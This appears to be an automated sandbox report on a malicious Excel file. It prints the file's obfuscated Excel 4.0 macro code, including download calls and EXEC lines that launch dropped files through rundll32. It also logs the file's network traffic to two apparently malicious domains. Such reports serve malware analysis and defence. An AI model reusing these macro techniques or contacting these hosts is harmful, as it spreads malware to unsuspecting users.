                                                                          Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 363283
                                                                          General
                                                                          Stream Path:Book
                                                                          File Type:Applesoft BASIC program data, first line number 8
                                                                          Stream Size:363283
                                                                          Entropy:3.24522262131
                                                                          Base64 Encoded:True
                                                                          Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . v i - v i B . . . . . . . . . . . . . . . . . . . . . . . D o c 3 . . . . . . . . . . . . . . . . . . _ x l f n . A G G R E G A T E . . . . . . . . . . . . . . . . . . . . _ x l f n . F . I N V . R T . . . . ! . . . . .
                                                                          Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 05 76 69 2d 76 69 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                          Macro 4.0 Code

                                                                          CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&"1",0,!AL21)=RUN(Doc4!AM6)
                                                                          
                                                                          ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ39&BA39&before.3.5.0.sheet!BB39&before.3.5.0.sheet!BC39,before.3.5.0.sheet!AU13)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ40&BA40&before.3.5.0.sheet!BB40&before.3.5.0.sheet!BC40,before.3.5.0.sheet!AU14)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(""U""&before.3.5.0.sheet!BC25&before.3.5.0.sheet!BC29&before.3.5.0.sheet!BF28&before.3.5.0.sheet!BC28&before.3.5.0.sheet!BC31&before.3.5.0.sheet!BF29&""A"",before.3.5.0.she
                                                                          "=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&""1"",0,!AL21)=RUN(Doc4!AM6)"
                                                                          "=MDETERM(56241452475)=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC17&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC18&""1""&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=RUN(Doc3!AY22)"

                                                                          Network Behavior

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          May 12, 2021 21:06:27.197551012 CEST49165443192.168.2.22192.185.39.58
                                                                          May 12, 2021 21:06:27.356185913 CEST44349165192.185.39.58192.168.2.22
                                                                          May 12, 2021 21:06:27.356297016 CEST49165443192.168.2.22192.185.39.58
                                                                          May 12, 2021 21:06:27.386086941 CEST49165443192.168.2.22192.185.39.58
                                                                          May 12, 2021 21:06:27.546911955 CEST44349165192.185.39.58192.168.2.22
                                                                          May 12, 2021 21:06:27.560975075 CEST44349165192.185.39.58192.168.2.22
                                                                          May 12, 2021 21:06:27.561023951 CEST44349165192.185.39.58192.168.2.22
                                                                          May 12, 2021 21:06:27.561058044 CEST44349165192.185.39.58192.168.2.22
                                                                          May 12, 2021 21:06:27.561161041 CEST49165443192.168.2.22192.185.39.58
                                                                          May 12, 2021 21:06:27.599241018 CEST49165443192.168.2.22192.185.39.58
                                                                          May 12, 2021 21:06:27.767267942 CEST44349165192.185.39.58192.168.2.22
                                                                          May 12, 2021 21:06:27.767497063 CEST49165443192.168.2.22192.185.39.58
                                                                          May 12, 2021 21:06:29.417469978 CEST49165443192.168.2.22192.185.39.58
                                                                          May 12, 2021 21:06:29.617268085 CEST44349165192.185.39.58192.168.2.22
                                                                          May 12, 2021 21:06:30.020272970 CEST44349165192.185.39.58192.168.2.22
                                                                          May 12, 2021 21:06:30.020450115 CEST49165443192.168.2.22192.185.39.58
                                                                          May 12, 2021 21:06:30.020714998 CEST44349165192.185.39.58192.168.2.22
                                                                          May 12, 2021 21:06:30.020792007 CEST49165443192.168.2.22192.185.39.58
                                                                          May 12, 2021 21:06:30.020813942 CEST49165443192.168.2.22192.185.39.58
                                                                          May 12, 2021 21:06:30.119555950 CEST49168443192.168.2.22192.185.32.232
                                                                          May 12, 2021 21:06:30.179385900 CEST44349165192.185.39.58192.168.2.22
                                                                          May 12, 2021 21:06:30.284921885 CEST44349168192.185.32.232192.168.2.22
                                                                          May 12, 2021 21:06:30.285065889 CEST49168443192.168.2.22192.185.32.232
                                                                          May 12, 2021 21:06:30.286072969 CEST49168443192.168.2.22192.185.32.232
                                                                          May 12, 2021 21:06:30.447608948 CEST44349168192.185.32.232192.168.2.22
                                                                          May 12, 2021 21:06:30.461158037 CEST44349168192.185.32.232192.168.2.22
                                                                          May 12, 2021 21:06:30.461186886 CEST44349168192.185.32.232192.168.2.22
                                                                          May 12, 2021 21:06:30.461199999 CEST44349168192.185.32.232192.168.2.22
                                                                          May 12, 2021 21:06:30.461394072 CEST49168443192.168.2.22192.185.32.232
                                                                          May 12, 2021 21:06:30.514415979 CEST49168443192.168.2.22192.185.32.232
                                                                          May 12, 2021 21:06:30.687272072 CEST44349168192.185.32.232192.168.2.22
                                                                          May 12, 2021 21:06:30.687468052 CEST49168443192.168.2.22192.185.32.232
                                                                          May 12, 2021 21:06:30.727348089 CEST49168443192.168.2.22192.185.32.232
                                                                          May 12, 2021 21:06:30.930167913 CEST44349168192.185.32.232192.168.2.22
                                                                          May 12, 2021 21:06:31.299655914 CEST44349168192.185.32.232192.168.2.22
                                                                          May 12, 2021 21:06:31.299815893 CEST49168443192.168.2.22192.185.32.232
                                                                          May 12, 2021 21:06:31.300182104 CEST44349168192.185.32.232192.168.2.22
                                                                          May 12, 2021 21:06:31.300261974 CEST49168443192.168.2.22192.185.32.232
                                                                          May 12, 2021 21:07:01.300415993 CEST44349168192.185.32.232192.168.2.22

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          May 12, 2021 21:06:27.110641003 CEST5219753192.168.2.228.8.8.8
                                                                          May 12, 2021 21:06:27.171176910 CEST53521978.8.8.8192.168.2.22
                                                                          May 12, 2021 21:06:28.180880070 CEST5309953192.168.2.228.8.8.8
                                                                          May 12, 2021 21:06:28.229871035 CEST53530998.8.8.8192.168.2.22
                                                                          May 12, 2021 21:06:28.241209030 CEST5283853192.168.2.228.8.8.8
                                                                          May 12, 2021 21:06:28.291661024 CEST53528388.8.8.8192.168.2.22
                                                                          May 12, 2021 21:06:28.827760935 CEST6120053192.168.2.228.8.8.8
                                                                          May 12, 2021 21:06:28.888394117 CEST53612008.8.8.8192.168.2.22
                                                                          May 12, 2021 21:06:28.900585890 CEST4954853192.168.2.228.8.8.8
                                                                          May 12, 2021 21:06:28.963512897 CEST53495488.8.8.8192.168.2.22
                                                                          May 12, 2021 21:06:30.056551933 CEST5562753192.168.2.228.8.8.8
                                                                          May 12, 2021 21:06:30.116555929 CEST53556278.8.8.8192.168.2.22

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                          May 12, 2021 21:06:27.110641003 CEST192.168.2.228.8.8.80x9610Standard query (0)signifysystem.comA (IP address)IN (0x0001)
                                                                          May 12, 2021 21:06:30.056551933 CEST192.168.2.228.8.8.80x246eStandard query (0)fcventasyservicios.clA (IP address)IN (0x0001)

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                          May 12, 2021 21:06:27.171176910 CEST8.8.8.8192.168.2.220x9610No error (0)signifysystem.com192.185.39.58A (IP address)IN (0x0001)
                                                                          May 12, 2021 21:06:30.116555929 CEST8.8.8.8192.168.2.220x246eNo error (0)fcventasyservicios.cl192.185.32.232A (IP address)IN (0x0001)

                                                                          HTTPS Packets

                                                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                          May 12, 2021 21:06:27.561058044 CEST192.185.39.58443192.168.2.2249165CN=cpcontacts.signifysystem.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Thu Apr 01 17:00:25 CEST 2021 Wed Oct 07 21:21:40 CEST 2020Wed Jun 30 17:00:25 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                          May 12, 2021 21:06:30.461199999 CEST192.185.32.232443192.168.2.2249168CN=mail.fcventasyservicios.cl CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Mar 16 13:01:12 CET 2021 Wed Oct 07 21:21:40 CEST 2020Mon Jun 14 14:01:12 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                          Code Manipulations

                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Start time:21:06:39
                                                                          Start date:12/05/2021
                                                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          Wow64 process (32bit):false
                                                                          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                          Imagebase:0x13fbc0000
                                                                          File size:27641504 bytes
                                                                          MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:21:06:46
                                                                          Start date:12/05/2021
                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:rundll32 ..\ritofm.cvm,DllRegisterServer
                                                                          Imagebase:0xff1b0000
                                                                          File size:45568 bytes
                                                                          MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:21:06:47
                                                                          Start date:12/05/2021
                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:rundll32 ..\ritofm.cvm1,DllRegisterServer
                                                                          Imagebase:0xff1b0000
                                                                          File size:45568 bytes
                                                                          MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Disassembly

                                                                          Code Analysis

                                                                          Reset < >